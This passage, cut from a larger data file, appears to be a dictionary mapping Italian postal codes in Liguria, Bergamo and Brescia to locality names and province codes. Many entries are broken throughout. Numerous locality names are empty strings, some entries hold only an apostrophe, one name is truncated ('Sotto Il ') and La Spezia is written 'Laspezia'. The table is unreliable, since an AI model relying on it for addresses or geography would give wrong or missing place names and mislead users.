[["Genova", "GE"]], "16123": [["Genova", "GE"]], "16124": [["Genova", "GE"]], "16125": [["Genova", "GE"]], "16126": [["Genova", "GE"]], "16127": [["Genova", "GE"]], "16128": [["Genova", "GE"]], "16129": [["Genova", "GE"]], "16131": [["Genova", "GE"]], "16132": [["Genova", "GE"]], "16133": [["Genova", "GE"], ["Apparizione", "GE"], ["Bavari", "GE"], ["", "GE"]], "16134": [["Genova", "GE"]], "16135": [["Genova", "GE"]], "16136": [["Genova", "GE"]], "16137": [["Genova", "GE"], ["Staglieno", "GE"]], "16138": [["Genova", "GE"], ["Molassana", "GE"]], "16139": [["Genova", "GE"]], "16141": [["Genova", "GE"], ["Sant'Eusebio", "GE"]], "16142": [["Genova", "GE"]], "16143": [["Genova", "GE"]], "16144": [["Genova", "GE"]], "16145": [["Genova", "GE"]], "16146": [["Genova", "GE"]], "16147": [["Genova", "GE"], ["Sturla", "GE"]], "16148": [["Genova", "GE"], ["", "GE"]], "16149": [["Genova", "GE"], ["Sampierdarena", "GE"]], "16151": [["Genova", "GE"], ["Campasso", "GE"]], "16152": [["", "GE"], ["Coronata", "GE"], ["Genova", "GE"]], "16153": [["Genova", "GE"], ["Borzoli", "GE"]], "16154": [["Genova", "GE"], ["", "GE"], ["", "GE"]], "16155": [["Pegli", "GE"], ["Multedo", "GE"], ["Genova", "GE"]], "16156": [["Genova", "GE"]], "16157": [["Genova", "GE"], ["Pra'", "GE"], ["'", "GE"]], "16158": [["Fabbriche", "GE"], ["Voltri", "GE"], ["Genova", "GE"]], "16159": [["Genova", "GE"], ["", "GE"], ["", "GE"]], "16161": [["Fegino", "GE"], ["Genova", "GE"], ["Teglia", "GE"]], "16162": [["Genova", "GE"], ["Bolzaneto", "GE"]], "16163": [["San Quirico In Val Polcevera", "GE"], 
["Genova", "GE"]], "16164": [["Genova", "GE"], ["Pontedecimo", "GE"]], "16165": [["Struppa", "GE"], ["Genova", "GE"]], "16166": [["Genova", "GE"], ["", "GE"]], "16167": [["Genova", "GE"], ["Nervi", "GE"], ["", "GE"]], "18010": [ ["Pietrabruna", "IM"], ["", "IM"], ["", "IM"], ["Carpasio", "IM"], ["", "IM"], ["Cervo", "IM"], ["Terzorio", "IM"], ["Boscomare", "IM"], ["", "IM"], ["Badalucco", "IM"], ["", "IM"], ["", "IM"], ["Triora", "IM"], ], "18011": [["Castellaro", "IM"]], "18012": [ ["Bordighera", "IM"], ["", "IM"], ["", "IM"], ["Seborga", "IM"], ["Vallebona", "IM"], ["'", "IM"], ], "18013": [ ["", "IM"], ["", "IM"], ["", "IM"], ["", "IM"], ], "18014": [["Ospedaletti", "IM"]], "18015": [["", "IM"], ["Pompeiana", "IM"]], "18016": [["", "IM"]], "18017": [ ["", "IM"], ["Cipressa", "IM"], ["Costarainera", "IM"], ["Civezza", "IM"], ["Lingueglietta", "IM"], ], "18018": [["Taggia", "IM"], ["", "IM"]], "18019": [["", "IM"], ["Vallecrosia", "IM"]], "18020": [ ["Caravonica", "IM"], ["Vasia", "IM"], ["Dolcedo", "IM"], ["", "IM"], ["Lucinasco", "IM"], ["", "IM"], ["Aurigo", "IM"], ["Ranzo", "IM"], ["Prela'", "IM"], ], "18021": [["Borgomaro", "IM"]], "18022": [["", "IM"], ["Cesio", "IM"], ["Cartari", "IM"]], "18023": [["", "IM"]], "18024": [["", "IM"], ["Nava", "IM"], ["Pornassio", "IM"]], "18025": [["Mendatica", "IM"], ["", "IM"], ["Piaggia", "CN"], ["", "CN"]], "18026": [ ["Armo", "IM"], ["Calderara", "IM"], ["", "IM"], ["Rezzo", "IM"], ["Vessalico", "IM"], ["Cenova", "IM"], ], "18027": [["Pontedassio", "IM"], ["Chiusanico", "IM"], ["Chiusavecchia", "IM"]], "18030": [ ["Airole", "IM"], ["", "IM"], ["", "IM"], ["", "IM"], ], "18031": [["Bajardo", "IM"]], "18032": [["Perinaldo", "IM"]], "18033": [["", "IM"], ["Camporosso", "IM"]], "18034": [["Ceriana", "IM"]], "18035": [["Dolceacqua", "IM"], ["Isolabona", "IM"], ["Apricale", "IM"]], "18036": [["Soldano", "IM"], ["", "IM"]], "18037": [["Pigna", "IM"]], "18038": [ ["Coldirodi", "IM"], ["", "IM"], ["", "IM"], ["Borello", "IM"], ["", "IM"], ["Bussana", "IM"], ["Poggio", "IM"], ["Verezzo", "IM"], ["", "IM"], ], "18039": [ ["Bevera", "IM"], ["Sealza", "IM"], ["Ventimiglia", "IM"], ["Torri", "IM"], ["Sant'Antonio", "IM"], ["Grimaldi", "IM"], ["", "IM"], ["Calvo", "IM"], ["Latte", "IM"], ["Trucco", "IM"], ["Roverino", "IM"], ], "18100": [ ["Imperia", "IM"], ["Vasia", "IM"], ["Dolcedo", "IM"], ["", "IM"], ["", "IM"], ["Prela'", "IM"], ["Oneglia", "IM"], ["", "IM"], ["", "IM"], ], "19010": [["Torza", "SP"], ["Maissana", "SP"]], "19011": [["Bonassola", "SP"]], "19012": [["Castello", "SP"], ["Carro", "SP"]], "19013": [["", "SP"]], "19014": [["Framura", "SP"]], "19015": [["Levanto", "SP"], ["Montale", "SP"]], "19016": [["", "SP"]], "19017": [["Manarola", "SP"], ["Riomaggiore", "SP"]], "19018": [["Vernazza", "SP"], ["Corniglia", "SP"]], "19020": [ ["Bottagna", "SP"], ["", "SP"], ["", "SP"], ["", "SP"], ["Ponzo'", "SP"], ["Fornola", "SP"], ["Zignago", "SP"], ["", "SP"], ["", "SP"], ["Follo", "SP"], ["Padivarma", "SP"], ["Suvero", "SP"], ["Beverino", "SP"], ["Mattarana", "SP"], ["Valeriano", "SP"], ["Carrodano", "SP"], ["", "SP"], ["", "SP"], ["Bastremoli", "SP"], ["Tivegna", "SP"], ["Valdurasca", "SP"], ["Brugnato", "SP"], ["", "SP"], ["", "SP"], ["Veppo", "SP"], ["", "SP"], ["", "SP"], ["", "SP"], ["Pignone", "SP"], ["Carpena", "SP"], ["", "SP"], ["Prati", "SP"], ["", "SP"], ["Bolano", "SP"], ["Ceparana", "SP"], ["", "SP"], ], "19021": [["", "SP"], ["Arcola", "SP"]], "19025": [ ["Portovenere", "SP"], ["", "SP"], ["", "SP"], ["", "SP"], ["Fezzano", "SP"], ], "19028": 
[ ["", "SP"], ["", "SP"], ["Scurtabo'", "SP"], ["Comuneglia", "SP"], ["Porciorasco", "SP"], ], "19030": [["Fiumaretta", "SP"]], "19031": [ ["", "SP"], ["Montemarcello", "SP"], ["Ameglia", "SP"], ["", "SP"], ], "19032": [ ["Serra", "SP"], ["Tellaro", "SP"], ["Lerici", "SP"], ["Pugliola", "SP"], ["Fiascherino", "SP"], ["", "SP"], ], "19033": [["Molicciara", "SP"], ["Colombiera", "SP"], ["", "SP"]], "19034": [ ["Luni", "SP"], ["Ortonovo", "SP"], ["Dogana", "SP"], ["", "SP"], ["Casano", "SP"], ["", "SP"], ["Nicola", "SP"], ["Serravalle", "SP"], ], "19037": [["", "SP"], ["", "SP"], ["", "SP"]], "19038": [ ["Sarzana", "SP"], ["Falcinello", "SP"], ["", "SP"], ["Sarzanello", "SP"], ["", "SP"], ["Marinella", "SP"], ["", "SP"], ], "19100": [["", "SP"]], "19121": [["Laspezia", "SP"]], "19122": [["Laspezia", "SP"]], "19123": [["Fabiano", "SP"], ["Chiappa", "SP"], ["Laspezia", "SP"], ["Pegazzano", "SP"]], "19124": [["Laspezia", "SP"], ["", "SP"]], "19125": [["Laspezia", "SP"], ["Migliarina", "SP"]], "19126": [["Isola", "SP"], ["Laspezia", "SP"]], "19131": [["Laspezia", "SP"], ["Cadimare", "SP"]], "19132": [["Marola", "SP"], ["Laspezia", "SP"], ["Campiglia", "SP"]], "19133": [["Biassa", "SP"], ["Laspezia", "SP"]], "19134": [["Laspezia", "SP"], ["Marinasco", "SP"], ["", "SP"]], "19135": [["Laspezia", "SP"], ["San Venerio", "SP"]], "19136": [["Termo", "SP"], ["Laspezia", "SP"], ["Melara", "SP"], ["Limone", "SP"]], "19137": [["Laspezia", "SP"], ["Pitelli", "SP"]], "19138": [["Laspezia", "SP"], ["", "SP"]], "19139": [["Muggiano", "SP"], ["Laspezia", "SP"]], "12071": [["Massimino", "SV"], ["Bagnasco", "CN"]], "17010": [["Osiglia", "SV"], ["Giusvalla", "SV"]], "17011": [["", "SV"], ["", "SV"], ["Ellera", "SV"]], "17012": [["", "SV"]], "17013": [["Murialdo", "SV"], ["Valle", "SV"], ["", "SV"], ["Piano", "SV"]], "17014": [ ["", "SV"], ["Bragno", "SV"], ["", "SV"], ["", "SV"], ["Ferrania", "SV"], ["", "SV"], ], "17015": [["", "SV"]], "17017": [["Roccavignale", "SV"], ["Millesimo", "SV"], ["Cosseria", "SV"]], "17019": [["Alpicella", "SV"], ["Casanova", "SV"], ["Varazze", "SV"], ["Faie", "SV"], ["Pero", "SV"]], "17020": [ ["", "SV"], ["Stellanello", "SV"], ["", "SV"], ["", "SV"], ["Balestrino", "SV"], ["Magliolo", "SV"], ["Testico", "SV"], ["", "SV"], ["Rialto", "SV"], ], "17021": [["Alassio", "SV"], ["Moglio", "SV"]], "17022": [["", "SV"], ["Borgio", "SV"]], "17023": [["Ceriale", "SV"]], "17024": [ ["", "SV"], ["Varigotti", "SV"], ["Feglino", "SV"], ["Finalborgo", "SV"], ["Finale Ligure", "SV"], ["Gorra", "SV"], ], "17025": [["Loano", "SV"]], "17026": [["Noli", "SV"]], "17027": [["Giustenice", "SV"], ["", "SV"]], "17028": [["Bergeggi", "SV"], ["Spotorno", "SV"], ["", "SV"]], "17030": [["Erli", "SV"], ["Castelbianco", "SV"], ["Nasino", "SV"]], "17031": [ ["", "SV"], ["Bastia", "SV"], ["Leca", "SV"], ["Lusignano", "SV"], ["Albenga", "SV"], ["Campochiesa", "SV"], ], "17032": [["Arnasco", "SV"], ["Vendone", "SV"]], "17033": [["Villafranca", "SV"], ["Garlenda", "SV"], ["", "SV"]], "17034": [["", "SV"]], "17035": [["", "SV"]], "17037": [["Pogli", "SV"], ["Onzo", "SV"], ["Ortovero", "SV"]], "17038": [["", "SV"]], "17039": [["Zuccarello", "SV"]], "17040": [["Mioglia", "SV"]], "17041": [["Altare", "SV"], ["Cadibona", "SV"]], "17042": [["", "SV"], ["Giovo", "SV"], ["Pontinvrea", "SV"]], "17043": [["Plodio", "SV"], ["Pallare", "SV"], ["Piani", "SV"], ["Carcare", "SV"]], "17044": [ ["", "SV"], ["San Martella", "SV"], ["", "SV"], ["Stella", "SV"], ["", "SV"], ], "17045": [["Mallare", "SV"], ["Bormida", "SV"]], "17046": 
[["Sassello", "SV"], ["Palo", "SV"], ["Piampaludo", "SV"]], "17047": [["", "SV"], ["Valleggia", "SV"], ["Quiliano", "SV"]], "17048": [ ["Olba", "SV"], ["", "SV"], ["Vara", "SV"], ["", "SV"], ["", "SV"], ["Urbe", "SV"], ], "17051": [["Andora", "SV"], ["", "SV"]], "17052": [["", "SV"]], "17053": [["Laigueglia", "SV"]], "17054": [["Boissano", "SV"]], "17055": [["Toirano", "SV"]], "17056": [["Cengio", "SV"]], "17057": [["Calizzano", "SV"], ["Bardineto", "SV"], ["Caragna", "SV"]], "17058": [["", "SV"], ["Dego", "SV"]], "17100": [ ["Savona", "SV"], ["Santuario", "SV"], ["", "SV"], ["Zinola", "SV"], ["Legino", "SV"], ["Lavagnola", "SV"], ["Fornaci", "SV"], ], "24010": [ ["Dossena", "BG"], ["Vedeseta", "BG"], ["", "BG"], ["Ubiale", "BG"], ["", "BG"], ["Valleve", "BG"], ["Ubiale Clanezzo", "BG"], ["Branzi", "BG"], ["Muggiasca", "BG"], ["Valnegra", "BG"], ["Colla", "BG"], ["", "BG"], ["Piazzatorre", "BG"], ["Roncobello", "BG"], ["Piazzolo", "BG"], ["Carona", "BG"], ["Cusio", "BG"], ["", "BG"], ["Peghera", "BG"], ["Ornica", "BG"], ["Cassiglio", "BG"], ["Foppolo", "BG"], ["", "BG"], ["Ponteranica", "BG"], ["Sorisole", "BG"], ["Mezzoldo", "BG"], ["Clanezzo", "BG"], ["", "BG"], ["Botta", "BG"], ["", "BG"], ["Bordogna", "BG"], ["Algua", "BG"], ["Petosino", "BG"], ["Taleggio", "BG"], ["Valtorta", "BG"], ["Averara", "BG"], ["Fondra", "BG"], ["Olda", "BG"], ["Lenna", "BG"], ["Bracca", "BG"], ["Blello", "BG"], ["Sedrina", "BG"], ], "24011": [["Alme'", "BG"]], "24012": [ ["Laxolo", "BG"], ["", "BG"], ["Gerosa", "BG"], ["Brembilla", "BG"], ["", "BG"], ], "24013": [["", "BG"]], "24014": [["", "BG"]], "24015": [["", "BG"]], "24016": [["", "BG"], ["", "BG"]], "24017": [["Cornalba", "BG"], ["Serina", "BG"]], "24018": [["'", "BG"]], "24019": [["Poscante", "BG"], ["Spino", "BG"], ["Zogno", "BG"], ["Ambria", "BG"]], "24020": [ ["Selvino", "BG"], ["Bondione", "BG"], ["", "BG"], ["Negrone", "BG"], ["Cene", "BG"], ["Casnigo", "BG"], ["Piario", "BG"], ["Ardesio", "BG"], ["Gorle", "BG"], ["Parre", "BG"], ["Songavazzo", "BG"], ["Fiumenero", "BG"], ["", "BG"], ["Dezzo", "BG"], ["Valgoglio", "BG"], ["", "BG"], ["", "BG"], ["Ranica", "BG"], ["Boario", "BG"], ["Premolo", "BG"], ["Peia", "BG"], ["Cerete", "BG"], ["Oneta", "BG"], ["", "BG"], ["Rovetta", "BG"], ["Gorno", "BG"], ["Aviatico", "BG"], ["Scanzorosciate", "BG"], ["Gavarno", "BG"], ["", "BG"], ["", "BG"], ["Pradalunga", "BG"], ["Onore", "BG"], ["Gromo", "BG"], ["Valbondione", "BG"], ["Bratto", "BG"], ["Gandellino", "BG"], ["Colzate", "BG"], ["Vilminore", "BG"], ["Scanzo", "BG"], ["", "BG"], ["Azzone", "BG"], ["", "BG"], ["", "BG"], ["", "BG"], ["Colere", "BG"], ["Schilpario", "BG"], ["", "BG"], ["Tribulina", "BG"], ["Villassio", "BG"], ["", "BG"], ["Rosciate", "BG"], ["Lizzola", "BG"], ["Cornale", "BG"], ], "24021": [ ["Comenduno", "BG"], ["Abbazia", "BG"], ["Albino", "BG"], ["Vall'Alta", "BG"], ["", "BG"], ["", "BG"], ], "24022": [["", "BG"], ["Nese", "BG"]], "24023": [["Clusone", "BG"]], "24024": [["Gandino", "BG"]], "24025": [["Orezzo", "BG"], ["Gazzaniga", "BG"]], "24026": [["", "BG"], ["Leffe", "BG"]], "24027": [["", "BG"], ["Nembro", "BG"]], "24028": [["", "BG"]], "24029": [["Vertova", "BG"]], "24030": [ ["Camoneone", "BG"], ["Paladina", "BG"], ["", "BG"], ["", "BG"], ["Crocette", "BG"], ["Valbrembo", "BG"], ["Strozza", "BG"], ["Mapello", "BG"], ["Celana", "BG"], ["Berbenno", "BG"], ["", "BG"], ["Capizzone", "BG"], ["", "BG"], ["Caprino", "BG"], ["Ambivere", "BG"], ["", "BG"], ["Presezzo", "BG"], ["", "BG"], ["Mozzo", "BG"], ["Carvico", "BG"], ["Barzana", "BG"], 
["Roncola", "BG"], ["Medolago", "BG"], ["Solza", "BG"], ["Bedulita", "BG"], ["Sant'Antonio", "BG"], ["Pontida", "BG"], ["", "BG"], ["Locatello", "BG"], ["", "BG"], ["Gromlongo", "BG"], ["", "BG"], ["Palazzago", "BG"], ["", "BG"], ], "24031": [["", "BG"]], "24033": [["", "BG"]], "24034": [["", "BG"]], "24035": [["Curno", "BG"]], "24036": [["", "BG"]], "24037": [["", "BG"], ["Brumano", "BG"], ["Frontale", "BG"], ["Calchera", "BG"]], "24038": [["Mazzoleni", "BG"], ["", "BG"], ["Valsecca", "BG"], ["", "BG"]], "24039": [["Sotto Il ", "BG"], ["", "BG"]], "24040": [ ["Suisio", "BG"], ["Lallio", "BG"], ["", "BG"], ["", "BG"], ["Isso", "BG"], ["", "BG"], ["Arcene", "BG"], ["", "BG"], ["Madone", "BG"], ["Boltiere", "BG"], ["Zingonia", "BG"], ["Levate", "BG"], ["", "BG"], ["", "BG"], ["", "BG"], ["Bottanuco", "BG"], ["Filago", "BG"], ["", "BG"], ["", "BG"], ["Verdellino", "BG"], ["Ghiaie", "BG"], ["Stezzano", "BG"], ["Calvenzano", "BG"], ["", "BG"], ["Pognano", "BG"], ["", "BG"], ["Ciserano", "BG"], ["", "BG"], ["", "BG"], ["Pagazzano", "BG"], ["Barbata", "BG"], ], "24041": [["Brembate", "BG"], ["Grignano", "BG"]], "24042": [["", "BG"], ["", "BG"], ["", "BG"]], "24043": [["Vidalengo", "BG"], ["Caravaggio", "BG"], ["Masano", "BG"]], "24044": [["Dalmine", "BG"], ["Sforzatica", "BG"], ["", "BG"]], "24045": [["Badalasco", "BG"], ["", "BG"]], "24046": [["", "BG"]], "24047": [["Geromina", "BG"], ["Treviglio", "BG"], ["Castel Cerreto", "BG"]], "24048": [["Treviolo", "BG"]], "24049": [["Verdello", "BG"]], "24050": [ ["Bariano", "BG"], ["", "BG"], ["Mozzanica", "BG"], ["Cortenuova", "BG"], ["Lurano", "BG"], ["Malpaga", "BG"], ["Cavernago", "BG"], ["Pumenengo", "BG"], ["Zanica", "BG"], ["Palosco", "BG"], ["", "BG"], ["Calcinate", "BG"], ["", "BG"], ["Ghisalba", "BG"], ["Grassobbio", "BG"], ["Covo", "BG"], ["Morengo", "BG"], ["", "BG"], ["Spirano", "BG"], ], "24051": [["Antegnate", "BG"]], "24052": [["", "BG"]], "24053": [["", "BG"]], "24054": [["Calcio", "BG"]], "24055": [["", "BG"]], "24056": [["Fontanella", "BG"]], "24057": [["Martinengo", "BG"]], "24058": [ ["", "BG"], ["", "BG"], ["", "BG"], ["Sola", "BG"], ], "24059": [["Basella", "BG"], ["Urgnano", "BG"]], "24060": [ ["", "BG"], ["Viadanica", "BG"], ["Sovere", "BG"], ["", "BG"], ["Credaro", "BG"], ["Ranzanico", "BG"], ["Casco", "BG"], ["", "BG"], ["Bianzano", "BG"], ["Endine", "BG"], ["Gorlago", "BG"], ["Bossico", "BG"], ["Chiuduno", "BG"], ["Monasterolo", "BG"], ["", "BG"], ["Entratico", "BG"], ["", "BG"], ["Telgate", "BG"], ["Pianico", "BG"], ["", "BG"], ["Villongo", "BG"], ["Zandobbio", "BG"], ["Parzanica", "BG"], ["", "BG"], ["Rogno", "BG"], ["", "BG"], ["Brusaporto", "BG"], ["", "BG"], ["Cividino", "BG"], ["", "BG"], ["", "BG"], ["", "BG"], ["Casazza", "BG"], ["", "BG"], ["Piangaiano", "BG"], ["", "BG"], ["Celatica", "BG"], ["Vigolo", "BG"], ["Grone", "BG"], ["Predore", "BG"], ["Tolari", "BG"], ["", "BG"], ["Montello", "BG"], ["Gandosso", "BG"], ["", "BG"], ["", "BG"], ["Bolgare", "BG"], ["Fonteno", "BG"], ["", "BG"], ["Bagnatica", "BG"], ["", "BG"], ["", "BG"], ], "24061": [["", "BG"]], "24062": [["", "BG"]], "24063": [["Castro", "BG"], ["", "BG"]], "24064": [["", "BG"]], "24065": [["Lovere", "BG"]], "24066": [["Pedrengo", "BG"]], "24067": [["Sarnico", "BG"]], "24068": [["Seriate", "BG"], ["Cassinone", "BG"]], "24069": [["Cenate Di Sotto", "BG"], ["Luzzana", "BG"], ["Cenate Sotto", "BG"], ["", "BG"]], "24100": [["Bergamo", "BG"]], "24121": [["Bergamo", "BG"]], "24122": [["Bergamo", "BG"]], "24123": [["Bergamo", "BG"], ["Valtesse", "BG"]], "24124": 
[["Redona", "BG"], ["Bergamo", "BG"]], "24125": [["Boccaleone", "BG"], ["Bergamo", "BG"]], "24126": [["Colognola Al Piano", "BG"], ["Malpensata", "BG"], ["Campagnola", "BG"], ["Bergamo", "BG"]], "24127": [["Bergamo", "BG"]], "24128": [["Bergamo", "BG"], ["Loreto", "BG"]], "24129": [["Bergamo", "BG"], ["Longuelo", "BG"]], "25010": [ ["", "BS"], ["", "BS"], ["Visano", "BS"], ["", "BS"], ["Acquafredda", "BS"], ["", "BS"], ["Isorella", "BS"], ["", "BS"], ["", "BS"], ["Campione", "BS"], ["Rivoltella", "BS"], ["Tremosine", "BS"], ["", "BS"], ["Remedello", "BS"], ["Pozzolengo", "BS"], ["Montirone", "BS"], ["Vesio", "BS"], ["Borgosatollo", "BS"], ], "25011": [["Calcinatello", "BS"], ["Calcinato", "BS"], ["", "BS"]], "25012": [["Viadana", "BS"], ["Calvisano", "BS"], ["Malpaga", "BS"], ["Mezzane", "BS"]], "25013": [["Carpenedolo", "BS"]], "25014": [["Capodimonte", "BS"], ["Castenedolo", "BS"]], "25015": [["", "BS"]], "25016": [["Ghedi", "BS"]], "25017": [["Lonato", "BS"], ["Sedena", "BS"], ["Centenaro", "BS"], ["Esenta", "BS"]], "25018": [["Vighizzolo", "BS"], ["Sant'Antonio", "BS"], ["Montichiari", "BS"], ["Novagli", "BS"]], "25019": [["", "BS"], ["Sirmione", "BS"]], "25020": [ ["Scarpizzolo", "BS"], ["Cignano", "BS"], ["Offlaga", "BS"], ["Gambara", "BS"], ["", "BS"], ["Cigole", "BS"], ["Faverzano", "BS"], ["Poncarale", "BS"], ["", "BS"], ["", "BS"], ["", "BS"], ["Fiesse", "BS"], ["Milzano", "BS"], ["", "BS"], ["Flero", "BS"], ["Pralboino", "BS"], ["", "BS"], ["Quinzanello", "BS"], ["Seniga", "BS"], ["", "BS"], ["Alfianello", "BS"], ["Dello", "BS"], ], "25021": [["", "BS"]], "25022": [["", "BS"], ["Motella", "BS"], ["Farfengo", "BS"], ["Padernello", "BS"]], "25023": [["Gottolengo", "BS"]], "25024": [["Castelletto", "BS"], ["", "BS"], ["Porzano", "BS"], ["Leno", "BS"]], "25025": [["Manerbio", "BS"]], "25026": [["Pontevico", "BS"]], "25027": [["", "BS"]], "25028": [["Verolanuova", "BS"], ["Cadignano", "BS"]], "25029": [["Verolavecchia", "BS"]], "25030": [ ["Longhena", "BS"], ["Pievedizio", "BS"], ["Pompiano", "BS"], ["Mairano", "BS"], ["Ludriano", "BS"], ["Roncadelle", "BS"], ["Barbariga", "BS"], ["", "BS"], ["Brandico", "BS"], ["Berlingo", "BS"], ["Erbusco", "BS"], ["Castelcovati", "BS"], ["Torbiato", "BS"], ["Castrezzato", "BS"], ["Roccafranca", "BS"], ["Maclodio", "BS"], ["", "BS"], ["Rudiano", "BS"], ["Cossirano", "BS"], ["Paratico", "BS"], ["", "BS"], ["Lograto", "BS"], ["", "BS"], ["Villachiara", "BS"], ["Zocco", "BS"], ["Orzivecchi", "BS"], ["", "BS"], ["Comezzano", "BS"], ["Cizzago", "BS"], ["Coccaglio", "BS"], ["Trenzano", "BS"], ["Corzano", "BS"], ["Adro", "BS"], ], "25031": [["Capriolo", "BS"]], "25032": [["Chiari", "BS"]], "25033": [["Cologne", "BS"]], "25034": [["Orzinuovi", "BS"], ["Coniolo", "BS"]], "25035": [["Ospitaletto", "BS"]], "25036": [["", "BS"], ["", "BS"]], "25037": [["Pontoglio", "BS"]], "25038": [["Duomo", "BS"], ["Sant'Andrea", "BS"], ["Rovato", "BS"], ["Lodetto", "BS"], ["Sant'Anna", "BS"]], "25039": [["Travagliato", "BS"]], "25040": [ ["", "BS"], ["Cerveno", "BS"], ["Badetto", "BS"], ["Plemo", "BS"], ["Incudine", "BS"], ["", "BS"], ["Lozio", "BS"], ["", "BS"], ["", "BS"], ["Galleno", "BS"], ["Borgonato", "BS"], ["Nigoline", "BS"], ["Malonno", "BS"], ["Bienno", "BS"], ["Artogne", "BS"], ["", "BS"], ["Timoline", "BS"], ["Monno", "BS"], ["Bonomelli", "BS"], ["", "BS"], ["Sacca", "BS"], ["Cevo", "BS"], ["", "BS"], ["Prestine", "BS"], ["Gianico", "BS"], ["Colombaro", "BS"], ["Braone", "BS"], ["Esine", "BS"], ["Santicolo", "BS"], ["", "BS"], ["", "BS"], ["", "BS"], ["Ceto", 
"BS"], ["", "BS"], ["", "BS"], ], "25041": [["", "BS"], ["Erbanno", "BS"]], "25042": [["Borno", "BS"]], "25043": [["Astrio", "BS"], ["Pescarzo", "BS"], ["Breno", "BS"]], "25044": [["", "BS"]], "25045": [["Castegnato", "BS"]], "25046": [["Bornato", "BS"], ["", "BS"], ["Calino", "BS"], ["Pedrocca", "BS"]], "25047": [["Gorzone", "BS"], ["", "BS"], ["Darfo", "BS"]], "25048": [["Cortenedolo", "BS"], ["Edolo", "BS"], ["Sonico", "BS"]], "25049": [["Pilzone", "BS"], ["Iseo", "BS"], ["Clusane", "BS"]], "25050": [ ["", "BS"], ["Provezze", "BS"], ["Temu'", "BS"], ["Stadolina", "BS"], ["Zone", "BS"], ["Camignone", "BS"], ["", "BS"], ["", "BS"], ["Sellero", "BS"], ["Vione", "BS"], ["", "BS"], ["", "BS"], ["Ossimo", "BS"], ["Novelle", "BS"], ["Fontane", "BS"], ["", "BS"], ["Crist", "BS"], ["", "BS"], ["Pontagna", "BS"], ["Cimbergo", "BS"], ["Zurane", "BS"], ["Siviano", "BS"], ["", "BS"], ["Monterotondo", "BS"], ["Passirano", "BS"], ["", "BS"], ["Ome", "BS"], ["Niardo", "BS"], ["Gresine", "BS"], ["", "BS"], ["", "BS"], ["Paspardo", "BS"], ["Losine", "BS"], ], "25051": [["Cedegolo", "BS"]], "25052": [["", "BS"], ["Cogno", "BS"], ["Annunciata", "BS"], ["Piancogno", "BS"]], "25053": [["Malegno", "BS"]], "25054": [["Marone", "BS"]], "25055": [["Pisogne", "BS"], ["Toline", "BS"], ["Gratacasolo", "BS"]], "25056": [["", "BS"]], "25057": [["", "BS"]], "25058": [["Sulzano", "BS"]], "25059": [["", "BS"]], "25060": [ ["Pezzaze", "BS"], ["Cellatica", "BS"], ["", "BS"], ["Lodrino", "BS"], ["Polaveno", "BS"], ["Gombio", "BS"], ["Marcheno", "BS"], ["Stravignino", "BS"], ["Brozzo", "BS"], ["Fantasina", "BS"], ["Marmentino", "BS"], ["Collebeato", "BS"], ["Collio", "BS"], ["Lavone", "BS"], ["San Colombano", "BS"], ["", "BS"], ["Brione", "BS"], ], "25061": [["Irma", "BS"], ["Bovegno", "BS"]], "25062": [["", "BS"], ["Concesio", "BS"]], "25063": [["", "BS"], ["Magno", "BS"]], "25064": [["Piazza", "BS"], ["Ronco", "BS"], ["Mandolossa", "BS"], ["Gussago", "BS"]], "25065": [ ["", "BS"], ["", "BS"], ["Pieve", "BS"], ["Sant'Apollonio", "BS"], ["Lumezzane", "BS"], ["", "BS"], ], "25068": [["", "BS"], ["Zanano", "BS"], ["Sarezzo", "BS"]], "25069": [["Carcina", "BS"], ["Cogozzo", "BS"], ["", "BS"]], "25070": [ ["Preseglie", "BS"], ["Trebbio", "BS"], ["", "BS"], ["Mura", "BS"], ["Barghe", "BS"], ["Capovalle", "BS"], ["Sottocastello", "BS"], ["", "BS"], ["Anfo", "BS"], ["Gazzane", "BS"], ["", "BS"], ["Casto", "BS"], ["", "BS"], ["Caino", "BS"], ["", "BS"], ["Livemmo", "BS"], ["Bione", "BS"], ["", "BS"], ], "25071": [["Agnosine", "BS"]], "25072": [["Bagolino", "BS"]], "25073": [["Bovezzo", "BS"]], "25074": [["Idro", "BS"], ["Lavenone", "BS"], ["Crone", "BS"]], "25075": [["Nave", "BS"]], "25076": [["Odolo", "BS"]], "25077": [["", "BS"], ["Roe'", "BS"]], "25078": [["", "BS"], ["", "BS"], ["Vestone", "BS"], ["Nozza", "BS"]], "25079": [["Vobarno", "BS"], ["Carpeneda", "BS"], ["Pompegnino", "BS"], ["Degagna", "BS"]], "25080": [ ["", "BS"], ["Valvestino", "BS"], ["", "BS"], ["", "BS"], ["Mazzano", "BS"], ["Ciliverghe", "BS"], ["", "BS"], ["", "BS"], ["Soiano", "BS"], ["Castello", "BS"], ["Molinetto", "BS"], ["Gardola", "BS"], ["Serle", "BS"], ["Magasa", "BS"], ["Paitone", "BS"], ["", "BS"], ["", "BS"], ["", "BS"], ["Nuvolento", "BS"], ["Moerna", "BS"], ["Chiesa", "BS"], ["Solarolo", "BS"], ["Case Nuove", "BS"], ["", "BS"], ["Nuvolera", "BS"], ["", "BS"], ["Prevalle", "BS"], ["Muscoline", "BS"], ["Tignale", "BS"], ["Raffa", "BS"], ], "25081": [["Bedizzole", "BS"], ["Campagnola", "BS"]], "25082": [["", "BS"], ["", "BS"], ["Botticino", "BS"], 
["San Gallo", "BS"]], "25083": [["", "BS"], ["", "BS"], ["", "BS"], ["Montecucco", "BS"]], "25084": [["Gargnano", "BS"], ["Bogliaco", "BS"], ["Navazzo", "BS"]], "25085": [["San Giacomo", "BS"], ["San Biagio", "BS"], ["Sopraponte", "BS"], ["Gavardo", "BS"]], "25086": [["Rezzato", "BS"], ["", "BS"]], "25087": [["Barbarano", "BS"], ["Campoverde", "BS"], ["Salo'", "BS"]], "25088": [["", "BS"], ["Maderno", "BS"]], "25089": [["Bostone", "BS"], ["Villanuova Sul Clisi", "BS"]], "25100": [["Brescia", "BS"]], "25121": [["Brescia", "BS"]], "25122": [["Brescia", "BS"]], "25123": [["Brescia", "BS"]], "25124": [["Brescia", "BS"]], "25125": [["Brescia", "BS"]], "25126": [["Brescia", "BS"]], "25127": [["Brescia", "BS"]], "25128": [["Brescia", "BS"]], "25129": [["Brescia", "BS"], ["", "BS"]], "25131": [["Fornaci", "BS"], ["Brescia", "BS"]], "25132": [["Brescia", "BS"], ["", "BS"]], "25133": [["Brescia", "BS"], ["Mompiano", "BS"]], "25134": [["", "BS"], ["Brescia", "BS"]], "25135": [["Brescia", "BS"], ["Caionvico", "BS"], ["", "BS"]], "25136": [["Stocchetta", "BS"], ["Brescia", "BS"]], "22010": [ ["", "CO"], ["Urio", "CO"], ["Stazzona", "CO"], ["", "CO"], ["Germasino", "CO"], ["Peglio", "CO"], ["", "CO"], 